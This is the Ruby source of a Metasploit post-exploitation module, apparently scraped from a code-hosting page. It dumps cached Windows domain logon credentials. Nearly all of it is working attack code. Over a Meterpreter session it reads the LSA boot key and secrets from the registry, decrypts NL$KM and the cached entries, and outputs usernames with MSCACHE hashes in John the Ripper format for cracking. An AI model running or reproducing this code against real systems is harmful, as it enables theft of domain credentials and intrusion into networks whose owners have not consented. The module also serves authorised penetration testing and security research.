544 lines
15 KiB
Ruby
544 lines
15 KiB
Ruby
##
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# $Id$
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##
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# post/windows/gather/cachedump.rb
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##
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# This file is part of the Metasploit Framework and may be subject to
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# redistribution and commercial restrictions. Please see the Metasploit
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# Framework web site for more information on licensing and terms of use.
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# http://metasploit.com/framework/
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##
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require 'msf/core'
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require 'rex'
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require 'msf/core/post/windows/registry'
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class Metasploit3 < Msf::Post
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include Msf::Post::Windows::Registry
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def initialize(info={})
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super( update_info(info,
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'Name' => 'Windows Gather Credential Cache Dump',
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'Description' => %q{
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This module uses the registry to extract the stored domain hashes that have been
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cached as a result of a GPO setting. The default setting on Windows is to store
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the last ten successful logins.},
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'License' => MSF_LICENSE,
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'Author' => ['Maurizio Agazzini <inode[at]mediaservice.net>','Rob Fuller <mubix[at]hak5.org>'],
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'Version' => '$Revision$',
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'Platform' => ['windows'],
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'SessionTypes' => ['meterpreter'],
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'References' => [['URL', 'http://lab.mediaservice.net/code/cachedump.rb']]
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))
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register_options(
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[
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OptBool.new('DEBUG', [true, 'Debugging output', false])
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], self.class)
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end
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def check_gpo
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begin
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winlogonkey = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", KEY_READ)
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gposetting = winlogonkey.query_value('CachedLogonsCount').data
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print_status("Cached Credentials Setting: #{gposetting.to_s} - (Max is 50 and 0 disables, and 10 is default)")
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#ValueName: CachedLogonsCount
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#Data Type: REG_SZ
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#Values: 0 - 50
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rescue ::Exception => e
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print_error("Cache setting not found...")
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end
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end
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def capture_boot_key
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bootkey = ""
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basekey = "System\\CurrentControlSet\\Control\\Lsa"
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%W{JD Skew1 GBG Data}.each do |k|
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ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
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return nil if not ok
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bootkey << [ok.query_class.to_i(16)].pack("V")
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ok.close
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end
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keybytes = bootkey.unpack("C*")
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descrambled = ""
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descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
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0.upto(keybytes.length-1) do |x|
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descrambled << [keybytes[descrambler[x]]].pack("C")
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end
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return descrambled
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end
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def capture_lsa_key(bootkey)
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begin
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print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
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ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
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pol = ok.query_value("").data
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print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] )
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ok.close
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print_status("XP compatible client")
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@vista = 0
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rescue
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print_status("Trying 'Vista' style...")
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print_status("Getting PolEKList...") if( datastore['DEBUG'] )
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ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
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pol = ok.query_value("").data
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ok.close
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print_status("Vista compatible client")
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@vista = 1
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end
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if( @vista == 1 )
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lsakey = decrypt_lsa(pol, bootkey)
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lsakey = lsakey[68,32]
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else
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md5x = Digest::MD5.new()
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md5x << bootkey
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(1..1000).each do
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md5x << pol[60,16]
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end
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rc4 = OpenSSL::Cipher::Cipher.new("rc4")
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rc4.key = md5x.digest
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lsakey = rc4.update(pol[12,48])
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lsakey << rc4.final
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lsakey = lsakey[0x10..0x1F]
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end
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return lsakey
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end
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def convert_des_56_to_64(kstr)
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des_odd_parity = [
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1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
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16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
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32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
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49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
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64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
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81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
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97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
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112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
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128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
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145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
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161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
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176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
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193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
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208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
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224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
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241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
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]
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key = []
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str = kstr.unpack("C*")
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key[0] = str[0] >> 1
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key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
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key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
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key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
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key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
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key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
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key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
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key[7] = str[6] & 0x7F
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0.upto(7) do |i|
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key[i] = ( key[i] << 1)
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key[i] = des_odd_parity[key[i]]
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end
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return key.pack("C*")
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end
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def decrypt_secret(secret, key)
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# Ruby implementation of SystemFunction005
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# the original python code has been taken from Credump
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j = 0
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decrypted_data = ''
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for i in (0...secret.length).step(8)
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enc_block = secret[i..i+7]
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block_key = key[j..j+6]
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des_key = convert_des_56_to_64(block_key)
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d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
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d1.padding = 0
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d1.key = des_key
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d1o = d1.update(enc_block)
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d1o << d1.final
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decrypted_data += d1o
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j += 7
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if (key[j..j+7].length < 7 )
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j = key[j..j+7].length
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end
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end
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dec_data_len = decrypted_data[0].ord
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return decrypted_data[8..8+dec_data_len]
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end
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def decrypt_lsa(pol, encryptedkey)
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sha256x = Digest::SHA256.new()
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sha256x << encryptedkey
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(1..1000).each do
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sha256x << pol[28,32]
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end
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aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
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aes.key = sha256x.digest
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print_status("digest #{sha256x.digest.unpack("H*")[0]}") if( datastore['DEBUG'] )
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decryptedkey = ''
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for i in (60...pol.length).step(16)
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aes.decrypt
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aes.padding = 0
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xx = aes.update(pol[i...i+16])
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decryptedkey += xx
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end
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return decryptedkey
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end
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def capture_nlkm(lsakey)
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ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
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nlkm = ok.query_value("").data
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ok.close
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print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
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if( @vista == 1 )
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nlkm_dec = decrypt_lsa( nlkm[0..-1], lsakey)
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else
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nlkm_dec = decrypt_secret( nlkm[0xC..-1], lsakey)
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end
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return nlkm_dec
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end
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def parse_decrypted_cache(dec_data, s)
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i = 0
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hash = dec_data[i...i+0x10]
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i+=72
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username = dec_data[i...i+(s.userNameLength)]
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i+=s.userNameLength
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i+=2 * ( ( s.userNameLength / 2 ) % 2 )
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vprint_good "Username\t\t: #{username}"
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vprint_good "Hash\t\t: #{hash.unpack("H*")[0]}"
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last = Time.at(s.lastAccess)
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vprint_good "Last login\t\t: #{last.strftime("%F %T")} "
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domain = dec_data[i...i+s.domainNameLength+1]
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i+=s.domainNameLength
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if( s.dnsDomainNameLength != 0)
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dnsDomainName = dec_data[i...i+s.dnsDomainNameLength+1]
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i+=s.dnsDomainNameLength
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i+=2 * ( ( s.dnsDomainNameLength / 2 ) % 2 )
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vprint_good "DNS Domain Name\t: #{dnsDomainName}"
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end
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if( s.upnLength != 0)
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upn = dec_data[i...i+s.upnLength+1]
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i+=s.upnLength
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i+=2 * ( ( s.upnLength / 2 ) % 2 )
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vprint_good "UPN\t\t\t: #{upn}"
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end
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if( s.effectiveNameLength != 0 )
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effectiveName = dec_data[i...i+s.effectiveNameLength+1]
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i+=s.effectiveNameLength
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i+=2 * ( ( s.effectiveNameLength / 2 ) % 2 )
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vprint_good "Effective Name\t: #{effectiveName}"
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end
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if( s.fullNameLength != 0 )
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fullName = dec_data[i...i+s.fullNameLength+1]
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i+=s.fullNameLength
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i+=2 * ( ( s.fullNameLength / 2 ) % 2 )
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vprint_good "Full Name\t\t: #{fullName}"
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end
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if( s.logonScriptLength != 0 )
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logonScript = dec_data[i...i+s.logonScriptLength+1]
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i+=s.logonScriptLength
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i+=2 * ( ( s.logonScriptLength / 2 ) % 2 )
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vprint_good "Logon Script\t\t: #{logonScript}"
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end
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if( s.profilePathLength != 0 )
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profilePath = dec_data[i...i+s.profilePathLength+1]
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i+=s.profilePathLength
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i+=2 * ( ( s.profilePathLength / 2 ) % 2 )
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vprint_good "Profile Path\t\t: #{profilePath}"
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end
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if( s.homeDirectoryLength != 0 )
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homeDirectory = dec_data[i...i+s.homeDirectoryLength+1]
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i+=s.homeDirectoryLength
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i+=2 * ( ( s.homeDirectoryLength / 2 ) % 2 )
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vprint_good "Home Directory\t\t: #{homeDirectory}"
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end
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if( s.homeDirectoryDriveLength != 0 )
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homeDirectoryDrive = dec_data[i...i+s.homeDirectoryDriveLength+1]
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i+=s.homeDirectoryDriveLength
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i+=2 * ( ( s.homeDirectoryDriveLength / 2 ) % 2 )
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vprint_good "Home Directory Drive\t: #{homeDirectoryDrive}"
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end
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vprint_good "User ID\t\t: #{s.userId}"
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vprint_good "Primary Group ID\t: #{s.primaryGroupId}"
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relativeId = []
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while (s.groupCount > 0) do
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# Todo: parse attributes
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relativeId << dec_data[i...i+4].unpack("V")[0]
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i+=4
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attributes = dec_data[i...i+4].unpack("V")[0]
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i+=4
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s.groupCount-=1
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end
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vprint_good "Additional groups\t: #{relativeId.join ' '}"
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if( s.logonDomainNameLength != 0 )
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logonDomainName = dec_data[i...i+s.logonDomainNameLength+1]
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i+=s.logonDomainNameLength
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i+=2 * ( ( s.logonDomainNameLength / 2 ) % 2 )
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vprint_good "Logon domain name\t: #{logonDomainName}"
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end
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@credentials <<
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[
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username,
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hash.unpack("H*")[0],
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logonDomainName,
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dnsDomainName,
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last.strftime("%F %T"),
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upn,
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effectiveName,
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fullName,
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logonScript,
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profilePath,
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homeDirectory,
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homeDirectoryDrive,
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s.primaryGroupId,
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relativeId.join(' '),
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]
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vprint_good "----------------------------------------------------------------------"
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return "#{username.downcase}:#{hash.unpack("H*")[0]}:#{dnsDomainName}:#{logonDomainName}\n"
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end
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def parse_cache_entry(cache_data)
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j = Struct.new(
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:userNameLength,
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:domainNameLength,
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:effectiveNameLength,
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:fullNameLength,
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:logonScriptLength,
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:profilePathLength,
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:homeDirectoryLength,
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:homeDirectoryDriveLength,
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:userId,
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:primaryGroupId,
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:groupCount,
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:logonDomainNameLength,
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:logonDomainIdLength,
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:lastAccess,
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:last_access_time,
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:revision,
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:sidCount,
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:valid,
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:sifLength,
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:logonPackage,
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:dnsDomainNameLength,
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:upnLength,
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:ch,
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:enc_data
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)
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s = j.new()
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s.userNameLength = cache_data[0,2].unpack("v")[0]
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s.domainNameLength = cache_data[2,2].unpack("v")[0]
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s.effectiveNameLength = cache_data[4,2].unpack("v")[0]
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s.fullNameLength = cache_data[6,2].unpack("v")[0]
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s.logonScriptLength = cache_data[8,2].unpack("v")[0]
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s.profilePathLength = cache_data[10,2].unpack("v")[0]
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s.homeDirectoryLength = cache_data[12,2].unpack("v")[0]
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s.homeDirectoryDriveLength = cache_data[14,2].unpack("v")[0]
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s.userId = cache_data[16,4].unpack("V")[0]
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s.primaryGroupId = cache_data[20,4].unpack("V")[0]
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s.groupCount = cache_data[24,4].unpack("V")[0]
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s.logonDomainNameLength = cache_data[28,2].unpack("v")[0]
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s.logonDomainIdLength = cache_data[30,2].unpack("v")[0]
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#Removed ("Q") unpack and replaced as such
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thi = cache_data[32,4].unpack("V")[0]
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tlo = cache_data[36,4].unpack("V")[0]
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q = (tlo.to_s(16) + thi.to_s(16)).to_i(16)
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s.lastAccess = ((q / 10000000) - 11644473600)
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s.revision = cache_data[40,4].unpack("V")[0]
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s.sidCount = cache_data[44,4].unpack("V")[0]
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s.valid = cache_data[48,4].unpack("V")[0]
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s.sifLength = cache_data[52,4].unpack("V")[0]
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s.logonPackage = cache_data[56,4].unpack("V")[0]
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s.dnsDomainNameLength = cache_data[60,2].unpack("v")[0]
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s.upnLength = cache_data[62,2].unpack("v")[0]
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s.ch = cache_data[64,16]
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s.enc_data = cache_data[96..-1]
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return s
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end
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def decrypt_hash(edata, nlkm, ch)
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rc4key = OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('md5'), nlkm, ch)
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rc4 = OpenSSL::Cipher::Cipher.new("rc4")
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rc4.key = rc4key
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dec = rc4.update(edata)
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dec << rc4.final
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return dec
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end
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def decrypt_hash_vista(edata, nlkm, ch)
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aes = OpenSSL::Cipher::Cipher.new('aes-128-cbc')
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aes.key = nlkm[16...-1]
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aes.padding = 0
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aes.decrypt
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aes.iv = ch
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jj = ""
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for i in (0...edata.length).step(16)
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xx = aes.update(edata[i...i+16])
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jj += xx
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end
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return jj
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end
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def run
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@credentials = Rex::Ui::Text::Table.new(
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'Header' => "MSCACHE Credentials",
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'Indent' => 1,
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'Columns' =>
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[
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"Username",
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"Hash",
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"Logon Domain Name",
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"DNS Domain Name",
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"Last Login",
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"UPN",
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"Effective Name",
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"Full Name",
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"Logon Script",
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"Profile Path",
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"Home Directory",
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"HomeDir Drive",
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"Primary Group",
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"Additional Groups"
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])
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begin
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print_status("Executing module against #{session.sys.config.sysinfo['Computer']}")
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client.railgun.netapi32()
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if client.railgun.netapi32.NetGetJoinInformation(nil,4,4)["BufferType"] != 3
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print_error("System is not joined to a domain, exiting..")
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return
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end
|
|
|
|
#Check policy setting for cached creds
|
|
check_gpo
|
|
|
|
print_status('Obtaining boot key...')
|
|
bootkey = capture_boot_key
|
|
print_status("Boot key: #{bootkey.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
|
|
print_status('Obtaining Lsa key...')
|
|
lsakey = capture_lsa_key(bootkey)
|
|
print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
|
|
print_status("Obtaining LK$KM...")
|
|
nlkm = capture_nlkm(lsakey)
|
|
print_status("NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
|
|
print_status("Dumping cached credentials...")
|
|
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Cache", KEY_READ)
|
|
|
|
john = ""
|
|
|
|
ok.enum_value.each do |usr|
|
|
if( "NL$Control" == usr.name) then
|
|
next
|
|
end
|
|
|
|
begin
|
|
nl = ok.query_value("#{usr.name}").data
|
|
rescue
|
|
next
|
|
end
|
|
|
|
cache = parse_cache_entry(nl)
|
|
|
|
if ( cache.userNameLength > 0 )
|
|
print_status("Reg entry: #{nl.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
print_status("Encrypted data: #{cache.enc_data.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
print_status("Ch: #{cache.ch.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
|
|
if( @vista == 1 )
|
|
dec_data = decrypt_hash_vista(cache.enc_data, nlkm, cache.ch)
|
|
else
|
|
dec_data = decrypt_hash(cache.enc_data, nlkm, cache.ch)
|
|
end
|
|
|
|
print_status("Decrypted data: #{dec_data.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
|
|
|
john += parse_decrypted_cache(dec_data, cache)
|
|
|
|
end
|
|
end
|
|
|
|
store_loot("mscache.creds", "text/csv", session, @credentials.to_csv,
|
|
"mscache_credentials.txt", "MSCACHE Credentials")
|
|
|
|
print_status("John the Ripper format:")
|
|
|
|
john.split("\n").each do |pass|
|
|
print "#{pass}\n"
|
|
end
|
|
|
|
if( @vista == 1 )
|
|
print_status("Hash are in MSCACHE_VISTA format. (mscash2)")
|
|
else
|
|
print_status("Hash are in MSCACHE format. (mscash)")
|
|
end
|
|
|
|
rescue ::Interrupt
|
|
raise $!
|
|
rescue ::Rex::Post::Meterpreter::RequestError => e
|
|
print_error("Meterpreter Exception: #{e.class} #{e}")
|
|
print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
|
|
end
|
|
end
|
|
end
|